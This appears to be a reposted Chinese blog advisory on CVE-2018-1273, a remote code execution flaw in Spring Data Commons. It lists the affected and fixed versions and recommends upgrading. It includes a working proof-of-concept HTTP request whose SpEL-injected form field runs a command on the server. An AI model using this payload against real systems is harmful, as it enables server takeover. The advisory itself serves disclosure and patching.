POC验证测试Spring Data Commons组件远程代码执行漏洞(CVE-2018-1273)

Spring Data Commons爆出远程代码执行漏洞(CVE-2018-1273),攻击者可构造包含有恶意代码的SPEL表达式实现远程代码攻击,直接获取服务器控制权限。

这是POC验证漏洞的测试http请求:

POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf

受影响范围

  • Spring Data Commons 1.13 – 1.13.10(Ingalls SR10)
  • Spring Data REST 2.6 – 2.6.10 (Ingalls SR10)
  • Spring Data Commons 2.0 – 2.0.5 (Kay SR5)
  • Spring Data REST 3.0 – 3.0.5 (Kay SR5)
  • 已不支持的旧版本

解决方案:

建议及时更新到官方最新版

Spring Data Commons组件:

  • 2.0.x版本用户更新至2.0.6
  • 1.13.x版本用户更新至1.13.11

已不支持的旧版本请更新到官方提供支持的最新版本

已经修复的版本:

  • Spring Data REST 2.6.11 (Ingalls SR11)
  • Spring Data REST 3.0.6 (Kay SR6)
  • Spring Boot 1.5.11
  • Spring Boot 2.0.1

原文 

https://majing.io/posts/10000011571252

本站部分文章源于互联网,本着传播知识、有益学习和研究的目的进行的转载,为网友免费提供。如有著作权人或出版方提出异议,本站将立即删除。如果您对文章转载有任何疑问请告之我们,以便我们及时纠正。

PS:推荐一个微信公众号: askHarries 或者qq群:474807195,里面会分享一些资深架构师录制的视频录像:有Spring,MyBatis,Netty源码分析,高并发、高性能、分布式、微服务架构的原理,JVM性能优化这些成为架构师必备的知识体系。还能领取免费的学习资源,目前受益良多

转载请注明原文出处:Harries Blog™ » POC验证测试Spring Data Commons组件远程代码执行漏洞(CVE-2018-1273)

赞 (0)
分享到:更多 ()

评论 0

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址